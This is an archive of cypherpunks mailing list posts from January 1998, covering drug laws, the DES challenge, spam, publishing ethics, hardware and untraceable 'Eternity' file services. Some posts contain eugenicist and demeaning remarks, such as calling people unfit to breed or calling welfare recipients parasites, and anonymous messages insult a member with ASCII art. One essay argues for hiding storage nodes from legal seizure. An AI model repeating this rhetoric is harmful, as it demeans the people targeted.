MIME-Version: 1.0
Content-Type: text/plain



 One of the reasons why all drugs should be legal
>is that people who should not breed will use the drugs to kill themselves,
>leaving more room/wealth/resources for their genetic superiors.

Ah yes, the argument against required motorcycle helmets which looks for
the increased organ
harvest for transplants.

Bogus reasoning.  You are sovereign and can do with yourself as you please.
 *That* is why substances should be legal and helmets should be optional.
Pragmatics are irrelevant.  I *do*
wear seatbelts but it should be my choice, not
something the state can use violence to enforce.

Pardon for the off-topic..





David Honig 			honig@alum.mit.edu
---------------------------------------------------
If we can prevent the government from wasting the labours of the people
under the pretense of
 caring for them, they will be happy.  -TJ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@acm.org>
Date: Sun, 11 Jan 1998 13:50:33 +0800
To: Trei Family <trei@relay-1.ziplink.net>
Subject: Re: DES 2 challenge: Are you going to help?
In-Reply-To: <3.0.1.32.19980110230904.007ec230@pop3.ziplink.net>
Message-ID: <Pine.LNX.3.96.980111004237.483I-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 10 Jan 1998, Trei Family wrote:
> I've heard of only one organized group which plans to attack it; the one
> based at www.distributed.net This is the same group which successfully 
> brute forced 56 bit RC5 encryption. My educated guess, based on the speed 
> with which they are currently searching RC5-64 (about 11 Gkey/sec) and the 
> known speed differences between RC5 and DES searching, is that they have 
> a good but not certain chance of finding the key within the $10,000 window.
> [Interesting factoid - at that speed they could crack 40 bit RC5 keys at
> better than one a minute.]
But distributed.net will not be focusing all of thier computing power on
one project. They are also doing the old des contests. So the power will
be diminished a little bit.

--
Douglas F. Elznic
delznic@acm.org
"If they give you lined paper, write the other way."
Freedom through Electronic Resistance





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Sun, 11 Jan 1998 13:59:26 +0800
To: cypherpunks@Algebra.COM
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <199801110603.AAA16499@einstein.ssz.com>
Message-ID: <34B85EED.2D12492D@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



> ... If an art critic declines
> to publish something, its a loss probably only to his fellow art critics,
> but if a mathematician or a biologist or a physicist doesn't publish, it's
> a loss for more than just his colleagues.

The author has a skewed view which says that science is more important
than
art.  Simply not true.  Don't get too narrow a view of "progress".

--David Miller

middle  rival
devil rim lad

Windows '95 -- a dirty, two-bit operating system.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sun, 11 Jan 1998 09:06:15 +0800
To: the sheriff <cypherpunks@cyberpass.net
Subject: Re: Spam
Message-ID: <19980111010001.27499.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



>I've got a question for y'all.
>
>Some idiot finally sent me a junk e-mail message that
>I couldn't do anything about with what I have the
>knowledge to do -- reading the headers turned up only
>one ISP, which was apparently owned by the spammer.
>
>I'm hoping you guys would know where I could find out
>more about this individual -- I'm hoping that he does
>in fact buy his service from someone else, and if so,
>I'm not sure how to find that out.  If he doesn't, is
>there anything I can do?

His traffic has to be routing through somebody or multiple somebodies.
Traceroute it and complain to the upstream site. Unless they're cretins like
CIX they'll kill his connection.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Sat, 10 Jan 1998 23:51:37 +0800
To: Paul Bradley <paul@fatmans.demon.co.uk>
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <Pine.LNX.3.91.980104133448.1037A-100000@fatmans.demon.co.uk>
Message-ID: <Pine.LNX.3.93.980111010436.141E-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 4 Jan 1998, Paul Bradley wrote:

[...]

> > My rights to swing my fists end at your noise.  When ever you interact
> > with other peaple your rights are tempered by there rights.  Even Adam
> > Smith recognised that its was gorverments dutie to redress the failing of
> > the market.
> 
> Why there is even discussion on this point on a list whose membership is 
> composed mainly of market anarchists is beyond me,

Since when has a crypto anarchist been a market anarchist?  

> the NAP and rights of 
> association should clearly define the answer to this question, no 
> agression is involved in the act of firing or declining to hire people 
> based on their colour/nationality or any other factor whatsoever. 

Ok a for instence,  if I was your boss and I sated that I would fire you
unless you would go *u-hum* cave exploring with me[1].  Such situations
have occured in the past, would you support them.

To me a person with that amount of power is uneceptable.

> > Also recall the free market model assumes that the word is full of totaly
> > rational pepeale who have full knowige of the market.  Any one who has
> > been on this list knows that these peaple are somewhat uncommen.
> 
> I don`t see the model that way at all,

I'm sorry but it is one of the fundermenalts of economic thory.

[...]

> the model is ethically right in that it allows businesses 
> and individuals to behave as they please as long as it harms no other 
> person,

So allowing someone to stave to death because thay have the wrong collour
of skin, or unwilling to get up close and personal with the boss, is not a
form of harm.

> sure, firing you may harm you by decreasing your income but this 
> is not an agressive act, it is a passive one: I have declined to offer 
> you, or keep you, in employment.

Immagion there is a truck rolling out of conrol in your direction,
keeping silent may harm you by preventing you from jumping out of the way,
but this is not an agressive act, it is a passive one: I have declined to
warn you.

[1] Not that I am thay way enclined.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNLeDGaQK0ynCmdStAQHzowP9HJvaXxE1/SI8uBsO2RhE03/qQL96vrLb
KV5+CblQs8qwAoy7edKtl36i/jM1U7pUdJOr81GzvHR7/0SIxuZzWOHYVkQxhW6q
jVF83U2MSToLFfRfsmwm2u+IfWZfqeqkL51L1DmdHm7CnntfviaSYssgRS0Ndaiw
b+LGW4LhWYk=
=7a6v
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Sun, 11 Jan 1998 00:02:12 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <aBw1ie20w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.93.980111012555.141H-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 8 Jan 1998, Dr.Dimitri Vulis KOTM wrote:

> Mark Rogaski <wendigo@ne-wendigo.jabberwock.org> writes:
> 
> > An entity claiming to be Bill Stewart wrote:
[...]
> > : It's only evolution in action if it gets them before they've reproduced...
> > :
> >
> > Actually, natural selection in action ...
> 
> Same thing...

There is a diffrence.  It is only evoltion if there is a combernation of
natural verence and natural selection.  If you have a population of
unchanging clones (your typical 'master race') you don't get any evoltion
or improvement.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNLeFiaQK0ynCmdStAQE0pwP+LGzDzFPvmhUJb1EGGdD2tlRlMR2I4vZA
wv1Qv7TIp/WfjgJvEfntiOskd3rbmb8ovm7ovmQgj+m4CbHn8tFcKfRWKKQuFzU4
GIC53FYTUCYYkAPSVLwFVhR/XZ/TlgoWvlaOkjTO5K8vDmCV4C6x1R8B71beeX/+
1+gjqIeEUNs=
=pI6H
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 15:50:36 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Head up - Press civil rights spin-doctorism...
Message-ID: <199801110815.CAA16906@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Check out the current 'Justice Files' on The Discovery Channle. The general
gist is that individual prior to being proven a criminal have too many civil
liberties and as a result police are hindered in their duties.

It'd be pretty funny if it wasn't serious.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 16:18:00 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Theory Behind USA v. Microsoft (fwd)
Message-ID: <199801110844.CAA17065@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 10 Jan 1998 23:13:28 -0800
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: Theory Behind USA v. Microsoft

> The total amount of actual capital was pretty small - about 
> 5000-6000 cars at $1000 each, back when that was still real money,

Half a million plus dollars is real money now too.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 16:24:53 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801110850.CAA17167@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 11 Jan 1998 00:17:40 -0800
> From: Blanc <blancw@cnw.com>
> Subject: Re: rant on the morality of confidentiality 

> I went to an exhibit yesterday of Leonardo da Vinci, where I saw the 400
> year old Codex Leicester.   He was "a keen observer" of Nature, and from
> his detailed studies he learned much which provided his inventive mind with
> much material for creative works.   The exhibit brings to mind not only his
> work, but the methods of such a great mind in reaching those heights and
> breadths.

Which one was it? I had the privilege of working on the IBM Leonardo
exhibit when it was in Austin at Discovery Hall about 10 years ago. Part of my
duties was to repair two of his models (the 'turtle' tank & his composite
ship hull design) and got a real appreciation of his skills.

There was a show on one of the cable science shows about Leonardo week before
last. You might want to review your schedule and catch it. I found it quite
entertaining and educational.



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lord_buttmonkey@juno.com (Matthew L Bennett)
Date: Sun, 11 Jan 1998 18:08:28 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks and guns
In-Reply-To: <19980106005136.23824@eskimo.com>
Message-ID: <19980111.045850.4894.3.Lord_Buttmonkey@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



>If we have to resort to physical violence, 
>we've
>already lost!

No, we wouldn't.  If we had to resort to physical violence against a
government, than it needs it, you shouldn't need to do that if the
Constitution is in effect.  Otherwise...

>Think about it: if we can defend ourselves with guns, why would we 
>need
>crypto?

Because holding up a PGP disk will not save your life if a
robber/looter/IRS Agent breaks into your house.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mix <mixmaster@remail.obscura.com>
Date: Sun, 11 Jan 1998 20:06:32 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199801111151.DAA14980@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



Timmy C. Maypole is a pimply dweeb sitting at a computer 
chortling at his own imagined cleverness.

              (/T\)  _____                     (/V\)
              (-,-) ()====) .  +  .   .    +   ('.') Timmy C. Maypole
              \(o)/   -|3 .     .   .       .  J\~/L
             /='
        ,OOO//|   |    .+   .   <%%%%%%%%%%%O >|<  \ooo,
        O:O:O LLLLL + .  .   .     .     I  .  //|\\ o:0:o
        \OOO/ || ||     .  .   .      +     .  ~|~|~ \ooo/
             C_) (_D                           _I I_





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lord_buttmonkey@juno.com (Matthew L Bennett)
Date: Sun, 11 Jan 1998 18:10:03 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <Pine.SUN.3.91.980109172923.24415C-100000@everest.pinn.net>
Message-ID: <19980111.045850.4894.5.Lord_Buttmonkey@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



>> >What is wrong selling privacy for money?
>> 
>> It usually involves making it shitty.
>
>Oh yeah, that's the way free enterprise works... if you make your 
>product 
>shitty, your customers will pay more for it!  Hey maybe if I do a 
>crappy 
>job, my employer will pay me more!

Erm, no.

Some businesses put out shoddy encryption products, regardless.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lord_buttmonkey@juno.com (Matthew L Bennett)
Date: Sun, 11 Jan 1998 18:11:34 +0800
To: sheriff@speakeasy.org
Subject: Re: Spam
In-Reply-To: <l03020901b0dd558f496e@[209.130.131.105]>
Message-ID: <19980111.045850.4894.7.Lord_Buttmonkey@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 10 Jan 1998 12:43:34 -0400 The Sheriff <sheriff@speakeasy.org>
writes:
>Some idiot finally sent me a junk e-mail message that
>I couldn't do anything about with what I have the 
>knowledge to do -- reading the headers turned up only
>one ISP, which was apparently owned by the spammer.

It happens.

>I'm hoping you guys would know where I could find out
>more about this individual -- I'm hoping that he does
>in fact buy his service from someone else, and if so,
>I'm not sure how to find that out.  If he doesn't, is
>there anything I can do?
  ^^^^^^^^^^^^^^^^^^^^^^^^^

Yeah, there is.

Delete the friggin e-mail like a sensible person.

I get a lot of spam every day, but I just delete it and go on with my
life.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 12 Jan 1998 09:17:31 +0800
To: Anonymous <anon@anon.efga.org>
Subject: Re: Congratulations!
In-Reply-To: <29c1c353e00d6e916744745acc2ece93@anon.efga.org>
Message-ID: <Pine.BSF.3.91.980111055520.4763D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




Just don't smurf them. I'm sure their service providor wouldn't like 
that, and it isn't nice. You should just hit the delete key, and respect 
their right to freely express themselves.

p.s. - Thanks for the little white pills, Dr. Vulis. I'm feeling much 
happier now.

On Sun, 11 Jan 1998, Anonymous wrote:

> In a message dated 02:06 01/11/98 -0800, WebSoft Associates, wrote:
>  
> > We at WebSoft Associates (http://www.websoftassoc.com) would like to
> > congratulate you on your recent selection by Inc. Magazine as
> > one of the 500 fastest growing private companies in the United States.
> 
> Wow! The cypherpunks are a fucking business? Am I a stock holder?
> 
> Ha-fucking-ha!
> 
> Is this line supposed to convince us that this was a targeted e-mail and *not*
> spam! <LOL>  Normally I just trash this stuff, but I really got a kick out of
> that.  I hope we can get to top 100 by the fall '98 <bg>
> 
> 
> 
> 
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Sun, 11 Jan 1998 19:15:56 +0800
To: "Raymond D. Mereniuk" <Raymond@fbn.bc.ca>
Subject: Re: In God We Antitrust, from the Netly News
Message-ID: <tw73eivi7t4.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



> [people disparaging the  AMD/Cyrix Processors, as well as defending them]

I have used a K6-200 overclocked to a K6-300 (83mhz bus speed) for
some time now, mostly accomplishing the cooling issue by leaving it
in my bedroom with the window open all winter.  It's a great
value -- for $200+$100 I got a processor and motherboard capable of
PII-level performance in things like code compiles, etc.  I've even
hand-optimized some code for the K6 -- it's a great chip.

If I find investors/customers/etc. by March-July 98 for Eternity DDS, though, 
I'm planning to buy 8 DEC AlphaPC motherboards with dual 21264 processors.
Some pieces of Eternity DDS are now being implemented in Oracle for
speed of implementation reasons, and other pieces are being prototyped
in Scheme (maybe), so even my K6 is getting hammered.  Plus, I'm now testing
some kernel modifications, and having to reboot the only functional server,
bring Oracle back up, initialize the world, bring up a web server and
an encrypted filesystem, etc. all without disrupting service too much
whenever I make a minor change, then do it every time I need to change
one character in the kernel, is really annoying.  Running the different
services on different machines would be far more realistic and practical.

[*Obcrypto*: I have gotten incredibly backed up with work of various
kinds, and email.  However, I still have time for silly web service
questions.  Here goes:

Does anyone know of a way I can take a web server, say AOLserver, which
does not support useful SSL, and also does not distribute source, and
retrofit a useful 128-bit SSL implementation to it?  It has a C API, but
I haven't looked at the API enough to see if I could do it within the API.
Are there any proxies which could be stuck between the insecure server
and the user (preferably with an ssh link between the servers) which could
provide SSL proxy service?  It seems like this should be trivial to do,
but I haven't tried yet, and I want to have some reedeming value for this
post.]
-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Sun, 11 Jan 1998 19:24:12 +0800
To: cypherpunks@Algebra.COM
Subject: openworld, inc.
Message-ID: <tw71zyfi7f4.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone looked at these people?  They seem to be selling turnkey
systems for offshore digital commerce, among other things, which I believe
is fundamentally interesting.  However, they seem like they're involved
in several traditional weird Government-affiliated international business
startup/consulting group/etc. projects, like educational resources, and
from what I remember of a Tim May response to them, they seemed to believe
money laundering/thoughtcrime/etc. was morally reprehensible and the
duty of technical people to prevent (I may be wrong, he may be wrong, they
may be wrong...)

[ObNonCrypto: I picked the 3-pin Medeco lock on the front of my 
IBM RS/6000 320 today.  I was just kind of sitting here with my new picks
and wrench and was bored and poking around, and I got it to go from Secure to
Normal.  Luckily the lock turns both ways, since I was picking it backwards :(
I've been thinking about and off and on trying to pick it for several months
now -- it's a pretty impressive lock for the case on a workstation.  3-pin
Medecos are a pale comparison to the real ones, though.  Guess what locks
I will specify from now on...] 
-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <anon@squirrel.owl.de>
Date: Sun, 11 Jan 1998 17:52:12 +0800
To: cypherpunks@Algebra.COM
Subject: Accounts payable
Message-ID: <bb8f09fc541d7689e4de92c858ab4912@squirrel>
MIME-Version: 1.0
Content-Type: text/plain



>Timmy C[rook] May is just a poor excuse for an unschooled, retarded thug.
>
>         (_) _____ (_)
>            /O   O\   Timmy C[rook] May
>           !   I   !
>           ! \___/ !
>            \_____/

Since when is Tim a government official?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Jan 1998 00:05:44 +0800
To: cypherpunks@toad.com
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <3.0.5.32.19980111002729.007cc410@otc.net>
Message-ID: <e9B6ie60w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



David Honig <honig@otc.net> writes:

>  One of the reasons why all drugs should be legal
> >is that people who should not breed will use the drugs to kill themselves,
> >leaving more room/wealth/resources for their genetic superiors.
>
> Ah yes, the argument against required motorcycle helmets which looks for
> the increased organ
> harvest for transplants.
>
> Bogus reasoning.  You are sovereign and can do with yourself as you please.
>  *That* is why substances should be legal and helmets should be optional.
> Pragmatics are irrelevant.  I *do*
> wear seatbelts but it should be my choice, not
> something the state can use violence to enforce.

The above is just one of the reasons why all drugs should be legalized.

As for helmets, seatbelts, et al, consider them in context: most kids
stupid enough to ride a bike wihtout a helmet are already on welfare.
If they get themselves certified brain-damaged (I don't know how the
doctors tell the difference :-) they'll be stealing even more of my money
through taxes. Therefore in the context of taxpayers paying the medical
bills of these parasites, helmets can be required.

> Pardon for the off-topic..

I try to find cryptorelevance in the publishing one's results v. secrecy
thread.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Jan 1998 00:07:31 +0800
To: cypherpunks@toad.com
Subject: Re: Zippo censors are losing customers
In-Reply-To: <006d01bd1e74$d5de57c0$54cbffd0@default>
Message-ID: <NJc6ie61w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



"Dr. Jai Maharaj" <jai@mantra.com> writes:

> > From: Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com>
> >
> >Zippo is now censoring more people besides Colin.  It may sound cheap
> >but it's not worth $19/year.
>
> Now many discussion threads (not spam) are missing from DejaNews also.
> They claim to be using "technology" developed by Zippo -- the following
> press release is located at:

It sounds like dejanews is applying nocem on spool, and also applying old
nocems to their historical databases. (Does that include chris lewis's
"trollcancels"?)

Zippo refuses to accept articles where the From: is one of the many people
they've blacklisted for content. See the recent article by Russ Allbery
on net.config where he promotes panix's patches to nntp for something similar.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Jan 1998 00:42:30 +0800
To: cypherpunks@toad.com
Subject: Shoddy crypto wares
In-Reply-To: <19980111.045850.4894.5.Lord_Buttmonkey@juno.com>
Message-ID: <NVH6ie68w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



lord_buttmonkey@juno.com (Matthew L Bennett) writes:

> >Oh yeah, that's the way free enterprise works... if you make your
> >product
> >shitty, your customers will pay more for it!  Hey maybe if I do a
> >crappy
> >job, my employer will pay me more!
>
> Erm, no.
>
> Some businesses put out shoddy encryption products, regardless.

In most industries, some vendors can get away with selling a shoddy product/
service because their cost of good sold is typically less, and they can
charge a lower price, some some buys will go for it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 12 Jan 1998 01:43:49 +0800
To: Ryan Lackey <cypherpunks@Algebra.COM
Subject: Eternity Services
In-Reply-To: <tw73eivi7t4.fsf@the-great-machine.mit.edu>
Message-ID: <v03102800b0deac61cffd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




I haven't been following the latest round of "Eternity" discussions. I
gather that Ryan's efforts are distinct from Adam Back's efforts, which are
themselves distinct from the seminal Ross Anderson researches (for example,
at http://www.cl.cam.ac.uk/users/rja14/eternity/node4.html).

But Ryan's comments leave me with some questions:


At 3:11 AM -0800 1/11/98, Ryan Lackey wrote:

>If I find investors/customers/etc. by March-July 98 for Eternity DDS, though,
>I'm planning to buy 8 DEC AlphaPC motherboards with dual 21264 processors.
>Some pieces of Eternity DDS are now being implemented in Oracle for
>speed of implementation reasons, and other pieces are being prototyped
>in Scheme (maybe), so even my K6 is getting hammered.  Plus, I'm now testing

Will these be located in the U.S.? Will their locations be publicized? Will
any offshore (non-U.S.) locations be publicized?

Any file system which can be identified as to *location in some legal
jurisdiction*, espeically in the U.S. but also probably in any
OECD/Interpol-compliant non-U.S. locations, will be subject to COMPLETE
SEIZURE under many circumstances:

* if any "child porn" is found by zealous prosecutors to be on the system(s)

* if any "national security violations" are found to be on the system(s)

* if the Software Publisher's Association (SPA) decides or determines that
the Eternity systems are being used for "warez" or other copyright
violations.

In addition, the file systems may be "discoverable" in any number of other
legal situations, and of course subject to subpoenas of all sorts. And
subject to court orders to halt operations, to participate in government
stings, and so on.

Basically, anything a remailer in some country may be subjected
to--lawsuits by Scientology, kiddie porn charges, espionage charges,
etc.--will be something an Eternity server is also subject to.

Except that an Eternity file system is more clearly just a file storage
system, like a filing cabinet or a storage locker, and hence is readily
interpreted in courts around the world as something that law enforcement
may seize, paw through, admit in court, etc. (Remailers are slightly better
protected, for both reasons of "transience" and reasons of some protection
under privacy laws, the ECPA, etc. We have not seen any major court orders
directed at remailers, but I expect them soon. In any case, a file system
containing "warez," child porn, corporate trade secrets, national security
violations, defamatory material, etc., would not be ignored for long.)

So, the talk about the hardware of all these Alpha servers raises some
interesting questions.

I would have thought that a much more robust (against the attacks above)
system would involve:

- nodes scattered amongst many countries, a la remailers

- no known publicized nexus (less bait for lawyers,  prosecutors, etc.)

- changeable nodes, again, a la remailers

- smaller and cheaper nodes, rather than expensive workstation-class nodes

- CD-ROMS made of Eternity files and then sold or distributed widely

- purely cyberspatial locations, with no know nexus

(I point to my own "BlackNet" experiment as one approach.)

It may be that the architectures/strategies being considered by Ryan
Lackey, Adam Back, and others are robust against the attacks described
above.

Basically, if the Eternity service(s) can be traced back to Ryan or Adam or
anyone else, they WILL be subject to court orders telling them to produce
certain files, telling them to cease and desist with regard to certain
distributions, and so on. Even raids to carry off the entire file system
for analysis will be likely.

Consider the Steve Jackson Games case, the Thomas/Amateur Action case, the
Riverside/Alcor case, and other raids which have seized computers and file
systems. Though some of these were later overturned, there was no general
protection granted that a file system, which is like a filing cabinet (of
course) is miraculously exempt from court action.

It is also likely in the extreme that a working Eternity service will
quickly be hit with attackers of various sorts who want to test the limits
of the service, or who want such services shut down. Thus, expect all kinds
of extremely controversial material to be posted....granted, this is a
"reason" for such services, but see how long the system lasts when it
contains child porn, Scientology secrets, lists of CIA agents in Europe,
copies of Microsoft Office for download, and on and on.

And even a decentralized, replicated system will of course still expose the
owner/operator in some jurisdiction to his local laws. (As Julf was exposed
to the laws in his country, and that was just the tip of the iceberg.)

Eternity nodes must not be identifiable, and their locations must not be
known. Anything else is just asking for major trouble.

Comments?



The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Jan 1998 00:06:31 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <199801110603.AAA16499@einstein.ssz.com>
Message-ID: <BsD6ie64w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:

> > From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>
> > Blanc <blancw@cnw.com> writes:
> > > Initially your argument had to do with secrecy and the need for scientist
> > > to publish their work so that the scientific community may benefit from i
> >
> > Not just the scientific community... everyone. If an art critic declines
> > to publish something, its a loss probably only to his fellow art critics,
> > but if a mathematician or a biologist or a physicist doesn't publish, it's
> > a loss for more than just his colleagues.
>
> I believe this view to be fundamentaly flawed. Consider that if a particular
> scientist doesn't publish (ala Fermat) then this does not inherently
> prohibit or inhibit others from deriving the result (lot's of examples so I
> won't pick a single one).

You don't seem to realize that the likelyhood of someone independently
rediscovering a "lost" math result is much less than the likelyhood of
two people independently creating substantially similar works of art.

For example, all of T.S.Elliot's poetry is substantially similar to
Walt Whitman's poetry. They are, for most intents and purposes, mutually
interchangeable. (Emily "lick my bud" Dickinson is almost interchangeable.)

> However, when an artist or other practitioner of
> human expression fails to publish then an item of unique character is lost.
> Had T.S. Elliot not written 'Old Possum's Book of Practical Cats' it is
> *very* unlikely that *anyone* in the entire remaining history of the
> universe would have written those charming poems and we would be deprived
> among other things of knowing why a cat has three names.

I was using art critics as an example, not artists.  Don't you know who art
critics are?

> In addition, the
> fact that a given individual finds no worth in why a cat has three names
> does not change the worth of the insight provided by the author. So, while a
> given art critics views may not mean much to you this does not justify in
> any manner trivializing that worth for others.

Think why I thought of art/lit critics and not, e.g., archeologists.

> To do so would indicate a
> personality of extreme hubris and potentialy a severe sociopathy.

Why thank you.

> Expect
> them to begin walking around with their hand in their vest at any moment.

I've got to get me a vest...

> The distinction is that human expression doesn't assume homogeneity nor
> isotropy as science requires. Rather it assumes a priori that each activity
> and it's result is unique in the history of the universe and fundamentaly an
> expression of that *individual* view of experience. That is what art derives
> it worth from while science derives its worth from the result being the same
> irrespective of the practitioner.

Well, you were just ranting about the non-euclidean geometries created by
Gauss, Lobachevsky, and janos (not Farkas) Bolyai.  Are they the same?
Does their choice of words to express their mathematical ideas matter?
Does it matter who published first? Would it be a loss for humanity if
